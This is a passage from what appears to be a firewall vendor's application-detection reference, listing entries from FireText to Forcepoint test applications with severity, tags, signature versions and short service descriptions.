First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FireText is the platform that helps display sms and social media on TV screens and website.
Back to top

Firmex

About this situation: Firmex usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to facilitate secure document sharing across corporate firewalls. Source: Wikipedia
Back to top

Firmwater-LMS

About this situation: Application Firmwater-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Firmwater is an e-learning company that specializes in helping training companies bring their content online.
Back to top

Firnass

About this situation: Application Firnass detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Firnass is a Remote Desktop Control
Back to top

First-Commonwealth-Federal-Credit-Union

About this situation: Application First-Commonwealth-Federal-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: First Commonwealth is a consumer-friendly alternative to banking. It offers all the services you're accustomed to, but at better rates and lower fees.
Back to top

First-Mortgage-Corp.

About this situation: Application First-Mortgage-Corp. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: First Mortgage Corporation is an independent residential mortgage banking firm with branch offices located throughout the west.
Back to top

FirstdataCorp

About this situation: Application FirstdataCorp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FirstdataCorp is the payment technology and service solutions. It provides secure payment technology and services to merchants and financial institution.
Back to top

FirstLook

About this situation: Application FirstLook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: First Look Media seeks to reimagine journalism for the digital age, combining the promise of technological innovation with the power of fearless reporting.
Back to top

Firstrade

About this situation: Application Firstrade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Firstrade is an investment firm offering investment products and tools designed to help investors take control of their financial.
Back to top

FirstTech

About this situation: Application FirstTech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: First Tech Federal Credit Union is a federally chartered credit union, regulated under the authority of the National Credit Union Administration
Back to top

Fischer-International

About this situation: Application Fischer-International detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fischer provides identity management software for outsourced and on-premise environments.
Back to top

Fisglobal

About this situation: Application Fisglobal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FIS provide banking and payments technology as well as consulting and outsourcing solutions.
Back to top

Fishbowl

About this situation: Application Fishbowl detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fishbowl helps restaurants optimize their marketing, strategy, and revenue management through advanced guest analytics software and deep industry expertise.
Back to top

Fision

About this situation: Application Fision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fision - sales enablement and marketing automation platform.
Back to top

Fitbit

About this situation: Fitbit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-773-5211
Description: Fitbit is a company producing activity trackers, which upload their data to the fitbit.com service.
Back to top

Fitzii---Predictive-Applicant-Tracking

About this situation: Application Fitzii---Predictive-Applicant-Tracking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fitzii applicant tracking and recruiting software uses proven science to immediately help you find and identify your best candidates, decrease your hiring costs and improve your time-to-hire.
Back to top

Five-Hundred-Plus

About this situation: Application Five-Hundred-Plus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Five Hundred Plus tool that helps you track conversations, manage contacts and make the most of your professional network.
Back to top

Five9-Inc

About this situation: Application Five9-Inc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Five9 is cloud contact center software solution, bringing the power of the cloud to thousands of customers worldwide.
Back to top

Fiverr

About this situation: Application Fiverr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fiverr is a marketplace for services that offeres business tasks and personalized gifts.
Back to top

Flabell

About this situation: Application Flabell detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flabell provides Components For Adobe Flash and customer service
Back to top

FLASH File

About this situation: Flash file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Other Suspicious Traffic, Media File, Adobe Flash
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Flash-Appointments

About this situation: Application Flash-Appointments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flash Appointments offers an unmatched suite of features built into our appointment scheduling software to meet your needs whether you are a large educational institution scheduling people with a part-time practice
Back to top

Flash-Arcade

About this situation: Flash Arcade usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Flash-Games-247

About this situation: Flash Games 247 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

FlashGet-HTTP

About this situation: FlashGet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-630-5211
Description: FlashGet is a freeware download manager for Microsoft Windows. It supports various protocols and allows users to download and manage downloaded files.
Back to top

Flashtalking

About this situation: Application Flashtalking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flashtalking is an independent ad serving, tracking and technology company, providing digital advertising products, service and support for online advertisers, key media buying and creative agencies.
Back to top

Flava

About this situation: Flava usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Flava is private note-taking service with personal timeline.
Back to top

Flavors.me

About this situation: Flavors.me usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Flavors.me allows anyone to easily create a beautiful branded website with content from around the internet and Flavors simple design tools
Back to top

Fleep

About this situation: Application Fleep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fleep is a secure messenger app that works with email. Keep conversations, files and pinned notes synced across different devices.
Back to top

FlexeraSoftware

About this situation: Application FlexeraSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FlexeraSoftware helps application producers and enterprises increase application usage and the value from their software.
Back to top

FlexMMS

About this situation: Application FlexMMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FlexMMS provides Smart Compliance Technology. FlexMMS saves you Time, Money and give you the insight to Manage Compliance Effectively.
Back to top

Flickr

About this situation: Flickr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1017-5242
Description: Flickr is a photo and video sharing website. The website was launched in 2004 and currently owned by Yahoo Inc.
Back to top

Flickr-Upload

About this situation: Flickr media upload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-1017-5242
Description: Flickr is a photo and video sharing website. The website was launched in 2004 and currently owned by Yahoo Inc.
Back to top

Flipdrive

About this situation: Flipdrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Flipdrive is your private online storage space, where you can store, access, share, and backup all of your data. Securely store your files, photos, contacts, favorite sites, calendar and any other data. Protect data from computer crashes and viruses. Easily and securely share your files, photos and other data with anyone.
Back to top

Flipkart

About this situation: Flipkart usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: During its initial years, Flipkart focused only on books, and soon as it expanded, it started offering other products like electronic goods, air conditioners, air coolers, stationery supplies and life style products and e-books.
Back to top

flipsnack

About this situation: Application flipsnack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SlideSnack - online presentation sharing tool.
Back to top

Flite

About this situation: Application Flite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flite is the only SaaS ad platform powering both mobile and display advertising, allows advertisers to scale content marketing and web app functionality into their digital advertising.
Back to top

Flixflux.com

About this situation: Flixflux.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Flixster

About this situation: Flixster usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Flixwagon

About this situation: Flixwagon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-595-5211
Description: Flixwagon is a mobile video broadcast and social networking platform.
Back to top

Float-Schedule

About this situation: Application Float-Schedule detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Float helps to schedule their team's time.Features include drag n drop task allocation, email notifications, skill tags, overtime and holiday tracking.
Back to top

Flow

About this situation: Application Flow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flow - task management solution.
Back to top

Flow-Software

About this situation: Application Flow-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flow Software provides configurable integration and EDI software.
Back to top

Flowdock

About this situation: Flowdock usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: Flowdock is a collaborative web application for team messaging.
Back to top

FlowPlayer

About this situation: Application FlowPlayer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FlowPlayer is a video player and hosting platform.
Back to top

Flowroute

About this situation: Application Flowroute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Flowroute is a SIP carrier which empowers modern business communications with enterprise SIP trunking you control.
Back to top

FluentCloud

About this situation: Application FluentCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FluentCloud provides cloud computing-based phone systems to help businesses manage phone system and phone service, in the cloud.
Back to top

FluidReview

About this situation: Application FluidReview detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FluidReview is an online platform that allow collect, manage and review applications online.
Back to top

Fluidsurveys

About this situation: FluidSurveys usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: is the web's leading provider of online survey, form and questionnaire software.
Back to top

Flumotion

About this situation: Flumotion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A multiformat streaming media platform to publish audio and video content over the internet; source Wikipedia
Back to top

Flurry

About this situation: Flurry usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Flurry is an on-line advertising service.
Back to top

Fluxiom

About this situation: fluxiom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a file sahring service that allows users to upload and share files (including photos and videos). Fluxiom offers a 30 day free trial.
Back to top

FlyDoc

About this situation: Application FlyDoc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FlyDoc multi-channel software for direct mail, fax and e-mail marketing campaigns
Back to top

Flyordie

About this situation: FlyOrDie usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Flyproxy

About this situation: Flyproxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1128-5242
Description: Flyproxy is a web proxy that supports SSL via the HTTPS protocol. The service is used to bypass Internet access filtering by countries or organizations.
Back to top

FM-Systems

About this situation: Application FM-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FM Systems software helps facilities professionals reduce space and maintenance costs and increase the efficient use of their facilities assets.
Back to top

FMI

About this situation: Application FMI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Food Marketing Institute
Back to top

FMI-Weather-Service

About this situation: FMI weather service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-630-5211
Description: Finnish Meteorological Institute (FMI) weather service usage has been detected.
Back to top

Fog-Creek-Copilot

About this situation: Application Fog-Creek-Copilot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fog Creek Copilot service allows friends, relatives, and customers to help each other solve their computer problems by letting one person temporarily connect to the computer of the other over the Internet.
Back to top

Fogbugz

About this situation: FogBugz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: FogBugz is integrated web-based project management system featuring bug/issue tracking, discussion forums, wikis, customer relationship management, and Evidence Based Scheduling developed by Fog Creek Software.Source: Wikipedia
Back to top

FogBugz-Online

About this situation: Application FogBugz-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FogBugz is an integrated web-based project management system featuring bug/issue tracking, discussion forums, wikis, customer relationship management, and evidence based scheduling.
Back to top

Folding@home

About this situation: Folding@home traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-1008-5242
Description: Folding@home is a distributed computing project that studies protein folding and misfolding.
Back to top

Follett-Admin

About this situation: Application Follett-Admin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Follett School Solutions, Inc. is deeply committed to helping the K-12 community reinvent education for the 21st century. Our integrated educational technologies are designed to help you create and sustain a rich, collaborative, technology-enabled environment that supports the life cycle of active learning and inspires student success.
Back to top

Follow-Up-Boss

About this situation: Application Follow-Up-Boss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Follow Up Boss - Respond faster, do more follow up, set more appointments, close more deals.
Back to top

Folloze

About this situation: Application Folloze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Folloze is tool to engage your colleagues and customers with great content: videos, links, pictures and files.
Back to top

Fonecta

About this situation: Fonecta usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-769-5211
Description: Fonecta is a Finnish company that provides a large variety of services, such as contact information, map and marketing services.
Back to top

Fonteva

About this situation: Application Fonteva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fonteva - cloud computing association management software.
Back to top

Fonts.com

About this situation: Application Fonts.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fonts.com provides selection of desktop and web fonts.
Back to top

Foodspotting

About this situation: Application Foodspotting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Foodspotting is a visual guide to good food and where to find it.
Back to top

Forbes

About this situation: Forbes.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Description: Frobes is a finance and business news organization
Back to top

Forbidden_File_Type_Seen

About this situation: Forbidden file type seen during inspection
Context: File Filtering
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: A file that have forbidden file type according to the file filtering policy was scanned by a scanning engine. The file has not been blocked.
Back to top

Forcepoint

About this situation: Forcepoint services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1814-5242
Description: Forcepoint online services usage has been detected.
Back to top

Forcepoint AMDP

About this situation: Forcepoint AMDP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Description: Forcepoint Advanced Malware Detection and Protection (AMDP) is a solution to detect and protect environments from advanced malware. It works with Forcepoint solutions to assist in defending against new threats.
Back to top

Forcepoint DLP

About this situation: Endpoint Context Agent based Forcepoint DLP detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1534-5242
Description: Forcepoint DLP endpoint application has been detected. Forcepoint DLP provides security focused on people's interaction with data, including in creation, storage, email, webmail, personal devices and cloud applications.
Back to top

Forcepoint ECA

About this situation: Endpoint Context Agent based Forcepoint Endpoint Context Agent detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1534-5242
Description: Forcepoint Endpoint Context Agent endpoint application detected.
Back to top

Forcepoint Neo Endpoint

About this situation: Endpoint Context Agent based Forcepoint Neo Endpoint detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Forcepoint Neo endpoint application has been detected.
Back to top

Forcepoint ONE

About this situation: Forcepoint ONE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Description: Forcepoint ONE is a Security Services Edge (SSE) platform that unifies ZTNA, CASB, SWG, and DLP in a cloud-native security solution.
Back to top

Forcepoint One Endpoint

About this situation: Endpoint Context Agent based Forcepoint One Endpoint detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Description: Forcepoint One Endpoint application detected.
Back to top

Forcepoint ONE SmartEdge Agent

About this situation: Endpoint Context Agent based Forcepoint ONE SmartEdge Agent
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1534-5242
Last changed: sgpkg-ips-1534-5242
Description: Forcepoint ONE SmartEdge Agent application has been detected.
Back to top

Forcepoint Support

About this situation: Forcepoint support site usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Description: Forcepoint support site provides support for customers.
Back to top

Forcepoint Test Application: Anonymizers/Proxies

About this situation: Forcepoint Test Application: Anonymizers/Proxies
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Anonymizers/Proxies matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b83.htmlor2)A connection is made to https://anonymizers-proxies.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Basic Internet Services

About this situation: Forcepoint Test Application: Basic Internet Services
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Basic Internet Services matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b6c.htmlor2)A connection is made to https://basic-internet-services.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Chat

About this situation: Forcepoint Test Application: Chat
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Chat matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b6d.htmlor2)A connection is made to https://chat.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Discussion Forum

About this situation: Forcepoint Test Application: Discussion Forum
Context: Application Context
Severity: 1
Tags: Web Applications, Discussion Forum
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Discussion Forum matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b6e.htmlor2)A connection is made to https://discussion-forum.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: ERP/CRM

About this situation: Forcepoint Test Application: ERP/CRM
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: ERP/CRM matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b70.htmlor2)A connection is made to https://erp-crm.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: File Sharing

About this situation: Forcepoint Test Application: File Sharing
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: File Sharing matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b71.htmlor2)A connection is made to https://file-sharing.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Finance

About this situation: Forcepoint Test Application: Finance
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Finance matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b72.htmlor2)A connection is made to https://finance.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Games

About this situation: Forcepoint Test Application: Games
Context: Application Context
Severity: 1
Tags: Web Applications, Games
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Games matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b6f.htmlor2)A connection is made to https://games.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Health

About this situation: Forcepoint Test Application: Health
Context: Application Context
Severity: 1
Tags: Web Applications, Health
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Health matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b73.htmlor2)A connection is made to https://health.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Hosting

About this situation: Forcepoint Test Application: Hosting
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Hosting matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b74.htmlor2)A connection is made to https://hosting.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: HR

About this situation: Forcepoint Test Application: HR
Context: Application Context
Severity: 1
Tags: Web Applications, HR
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: HR matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b75.htmlor2)A connection is made to https://hr.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Infrastructure Services

About this situation: Forcepoint Test Application: Infrastructure Services
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
Description: Forcepoint Test Application: Infrastructure Services matches if1)A decrypted connection to https://applications.policytest.ngfw.forcepoint.com serves any URL ending in:/12d149971553a38f740c49bdcfba1eabd23ce711bce320e2d1be37202eed6b76.htmlor2)A connection is made to https://infrastructure-services.applications.policytest.ngfw.forcepoint.com
Back to top

Forcepoint Test Application: Mail

About this situation: Forcepoint Test Application: Mail
Context: Application Context
Severity: 1
Tags: Web Applications, Mail
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1629-5242
